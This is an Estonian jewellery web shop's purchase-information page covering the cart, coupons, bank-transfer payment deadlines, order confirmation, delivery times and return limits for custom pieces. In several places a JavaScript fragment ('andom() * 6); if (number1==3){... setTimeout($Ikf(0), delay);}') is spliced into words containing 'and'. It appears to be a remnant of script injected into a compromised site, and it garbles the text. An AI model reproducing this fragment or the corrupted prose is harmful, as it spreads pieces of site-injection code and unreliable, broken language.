Ostuinfo

Toodete lisamine ostukorvi

Kõik TiAmio.eu e-poes olevate toodete pildid on illustratiivsed ning kauba kohta on püütud edasi andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anda võimalikult identset pilti – ehtekivide värv võib olla mõningatel juhtudel erineva tooniga olenevalt konkreetse arvutiekraani värvigammast!
TiAmio e-poes on hinnad eurodes (€).

Igal tootel on juures nupp “ostukorv”, mille peal klõpsates saate lisada vajaliku arvu tooteid ostukorvi. Kindlasti veenduge ennem, et ostukorvi on valitud vähemalt 1 tükk ning et valitud kaup on just Teile sobiv! Juhul, kui ühest tootest on olemas mitu erinevat varianti või suurust koos erineva kaaluga, on võimalik soovitud kaup fikseerida menüü valikuga või jätta soovitud kommentaar tellimuse lõpus vastavale väljale. Ostmiseks valige erineva kategooria toodete alt sobivad kaubad ja lisage need ostukorvi. Ostukorvi sisu vaatamiseks tuleb valida “OSTUKORV” ja sinna peale klõpsates avaneb Teile selle sisu.

Kui kasutatakse sooduskupongi, tuleb ka see kinnitada ostukorvis olles, sisestades sooduskupongi kood vastavale väljale.

Kuniks kaup on Ostja ostukorvis ja ostuprotsess on lõpetamata, on see saadaval ka kõigile teistele klientidele. Kui kõik vajalikud tooted on ära valitud ning ostukorvis kirjas, saate vormistada tellimuse. Oluline on jälgida, et kõik Teie andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andmed oleksid korrektsed, vastasel juhul ei jõua tellimus Teieni. Müüja ei vastuta Ostja poolt e-poes sisestatud andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andmete õigsuse eest ehk kui ostja sisestab ebakorrektse postiaadressi (postiautomaadi asukoha), ei pruugi saadetis kohale jõuda ning müüjal ei lasu selle eest vastutust. Oma eksimusest tuleks müüjale teada andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anda koheselt, sest enamasti on võimalik kiire teavitamise korral asju ümber muuta!
Kaupade hinnad TiAmio.eu kodulehel on eurodes. Kaupade eest tasutakse arve alusel pangaülekandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andega Salista OÜ arvelduskontole Swedbanka. Arve tasumise tähtaeg on viis kalendripäeva arvates tellimise päevast, kui ei ole erikokkuleppel teisiti määratud.

Peale tellimuse edastamist saab klient e-posti aadressile tellimuse kinnituse arve (VÕS § 621 lg 3). Juhul, kui tellimuse kinnituse arve ei ole paari tunni jooksul peale tellimuse esitamist Teie e-posti aadressile jõudnud (soovitav vaadata üle ka rämpsposti osa), siis teavitage sellest TiAmio.eu-d meili teel ehtekunstnik@tiamio.eu
Kui arve ei ole tasutud viie kalendripäeva jooksul, siis tellimus tühistatakse. Kaup saadetakse teele alles peale Tellija raha laekumist Müüja arvele. Arve tasumisel tuleb kontrollida kõikide andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andmete õigsust ning selgitusse märkida tellimusarve number ja toote kirjeldus.
Ettetellimisel olevad kaubad on ära näidatud toote müügihinnas (100%). Eritellimisel kaupade tarneaeg on kuni 30 päeva, üldjäänud kauba tarneaeg jääb 3-10 tööpäeva piiresse.
Eritellimusel valmivad tooted, nagu näiteks nimelised ehted, ei kuulu tagastamisele nende eripärast olenevalt (va defektsed esemed). Tellimisel oleva kauba kohta rohkem infot: ehtekunstnik@tiamio.eu